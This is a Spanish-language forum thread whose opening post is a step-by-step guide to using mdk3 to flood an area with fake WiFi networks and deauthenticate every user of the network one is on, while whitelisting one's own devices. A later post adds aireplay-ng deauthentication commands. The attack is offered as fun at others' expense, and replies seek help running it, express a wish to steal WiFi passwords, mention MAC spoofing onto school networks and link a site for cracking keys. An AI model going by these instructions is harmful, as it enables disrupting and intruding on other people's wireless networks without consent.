FORO SPAMLOCO


mdk3 creando fake APs y desconectando a todos de la WiFi


Consejos y soluciones sobre virus, rogues y otras amenazas...
   

mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Alejandro » Nov 2012, 22:37

Recién leía un artículo en S21sec sobre mdk3 y los Beacons frames attacks donde se muestra cómo realizar una inundación de SSID para dificultar la conexión de los usuarios a una red WiFi. Les recomiendo leerlo y complementando la información, comparto un par de funcionalidades que tiene la herramienta mdk3 y pueden ser muy divertidas para probar en casa :cop9:

mdk3 ya viene instalado en Backtrack, pero también se puede instalar en cualquier Linux http://homepages.tu-darmstadt.de/~p_larbig/wlan/). Antes de lanzarlo hay que poner la tarjeta wifi en modo monitor con un airmon-ng start wlan0 en la terminal (donde wlan0 es nuestra interfaz). Más info: http://www.aircrack-ng.org/doku.php?id=es:airmon-ng

Los siguientes comandos permiten acceder a la ayuda del programa y sus funciones:

mdk3 --fullhelp (ayuda completa)
mdk3 --help <test_mode> (ayuda de una opción en particular)

Imagen

Ahora viene la parte divertida... utilizando dos comandos muy simples se puede inundar el aire de redes wifi falsas y desconectar a todos los usuarios de la red wifi a la cual nosotros estamos conectados, de esta forma cuando vean que no pueden navegar intentarán conectarse de nuevo encontrándose con decenas de fake APs que no funcionan :-D

Para crear las redes falsas hay que utilizar el siguiente comando con la opción b de beacon:

mdk3 mon0 b (donde mon0 es la interfaz monitor, se pueden listar con un airmon-ng)

Este crea varias redes wifi con nombres aleatorios, como se puede ver en la siguiente captura:

Imagen

Y así lo ve un usuario de Windows: :fever:

Imagen

Esta lista de nombres también se puede personalizar utilizando un archivo de texto: mdk3 mon0 b -f <lista de nombres> lo cual puede ser mucho más divertido.

Una vez creados los APs falsos, se utiliza la opción d (Deauthentication / Disassociation) para desconectar a todos los que estén navegando del AP legítimo:

mdk3 mon0 d

Como se puede ver en la siguiente captura, se lanza un ataque por rangos de direcciones MAC lo cual provocaría una desconexión masiva de la red:

Imagen

Esto puede ser muy divertido, pero también nos desconectaría a nosotros mismos y la gracia es que nosotros podamos seguir conectados mientras que el resto no . La siguiente imagen muestra a mi iPhone víctima del ataque, intentando conectarse al WiFi:

Imagen

Para ello tenemos que filtrar nuestra MAC mediante el siguiente comando:

mdk3 mon0 d -w <lista de macs> (donde <lista de macs> es un archivo de texto que incluye las MAC que queremos perdonar como nuestra notebook, movil, etc)

A su vez, con el comando -b (de Blacklist o lista negra) se puede crear una lista de MACs específicas a atacar.

En resumen, los usuarios que estén en la misma red que nosotros se quedarán sin navegar, las páginas no cargarán y se desconectarán del AP, no entenderán qué sucede, se enojarán y al intentar conectarse de nuevo verán una lista enorme de redes disponibles que no sirven para nada.

Si necesitan ayuda con mdk3, pueden consultar, comentar, etc.
Avatar de Usuario
Alejandro
Administrador
 
Mensajes: 4110
Registrado: May 2009, 18:28
Ubicación: Uruguay
Twitter: @spamloco



Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Jorge Jacobo » Nov 2012, 00:23

Hey! Se oye interesante y divertido ;-) , lamentablemente estoy haciendo unos proyectos diferentes fuera del internet que me mantendrán ocupado por los siguientes 10 o 20 días. Pero lo voy a conservar como Bookmark, para regresar y avanzar en esto. :cool1:
Avatar de Usuario
Jorge Jacobo
Nivel 5
 
Mensajes: 358
Registrado: Oct 2011, 21:39
Ubicación: Salem Oregon USA
Twitter: @preguntameaqui

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Alejandro » Nov 2012, 02:11

Jorge, te recomiendo ver estos videos de hak5.org donde se habla sobre estos temas del wifi explicado muy bien y fácil de entedenr, es en inglés pero seguro no vas a tener problema con eso. Son 9 partes, dejo aquí la primera:


:arrow: Hak5 WiFi Hacking Workshop Part 1.1
Avatar de Usuario
Alejandro
Administrador
 
Mensajes: 4110
Registrado: May 2009, 18:28
Ubicación: Uruguay
Twitter: @spamloco

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Alejandro » Nov 2012, 15:05

Otra forma de desconectar un dispositivo comentado en el Workshop del video, utilizando Aircrack.

Imagen

Se pone la tarjeta en modo monitor:

airmon-ng start wlan0

Se cambia el canal de la interfaz al mismo que utiliza el AP:

iwconfig mon0 channel X (donde mon0 es la interfaz monitor activa y X el canal del punto de acceso)

Y se lanzan los paquetes de desconexión:

aireplay-ng -0 10 -a <mac> -c <mac> mon0

-0 es la orden para desconectar, el 10 es la cantidad de paquetes que se envían, pueden ser más.
-a es la dirección MAC del punto de acceso
-c es la dirección MAC de destino u objetivo

El resultado, como ocurre con mdk3, es que el dispositivo o equipo no se puede conectar mientras dura el bombardeo.
Avatar de Usuario
Alejandro
Administrador
 
Mensajes: 4110
Registrado: May 2009, 18:28
Ubicación: Uruguay
Twitter: @spamloco

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor cenomeno » Abr 2013, 05:51

buenas necesito mas alluda sobre mdk3 creando fake APs y desconectando a todos de la WiFi

no se muy bien crear redes creo un archivo txt con los nombre que quiero repetir pero no sale nada sino otras que llo no creado
cenomeno
Nivel 1
 
Mensajes: 3
Registrado: Abr 2013, 05:45

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Alejandro » Abr 2013, 09:42

Creo que debes estar escribiendo mal la ruta hacia el archivo .txt
Avatar de Usuario
Alejandro
Administrador
 
Mensajes: 4110
Registrado: May 2009, 18:28
Ubicación: Uruguay
Twitter: @spamloco

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor Rod » Abr 2013, 10:10

que hijos de p !!! te imaginas la gente loca de la vida viendo tantas redes..y todo falso.
La verdad a mí lo único que me gustaría es saber contraseñas ajenas :lol: :lol: :lol:

hay de todo que te prometen sacarlas...pero es medio trucho todo...no funca
Rod
Nivel 9
 
Mensajes: 1032
Registrado: Feb 2012, 09:38
Twitter: @

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor elQuique » Abr 2013, 17:08

De forma similar algunos mienten el MAC Address para hacerse pasar como ceibalita y usar las redes WIFI de centros educativos, cuack !
Avatar de Usuario
elQuique
Moderador
 
Mensajes: 2230
Registrado: May 2009, 18:43
Ubicación: Florida, Uruguay
Twitter: @elQuique

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor cenomeno » Abr 2013, 04:29

Bueno también es tuve probando desconectar a todo los que es tan conectados por vía wifi usando el comando
MKT3 MON0 D -M hy tampoco funciona muí bien no se si sera porque algo estoy poniendo mal podrían subir un vi dio
de como se puede usar esta herramienta por que veo que tiene barias cosas .
saludos
cenomeno
Nivel 1
 
Mensajes: 3
Registrado: Abr 2013, 05:45

Re: mdk3 creando fake APs y desconectando a todos de la WiFi

Notapor cenomeno » Abr 2013, 07:51

rod si quieres sacar clabes entra a qui i aprende un poco anda
wifiexlas.pagina.gr
cenomeno
Nivel 1
 
Mensajes: 3
Registrado: Abr 2013, 05:45


cron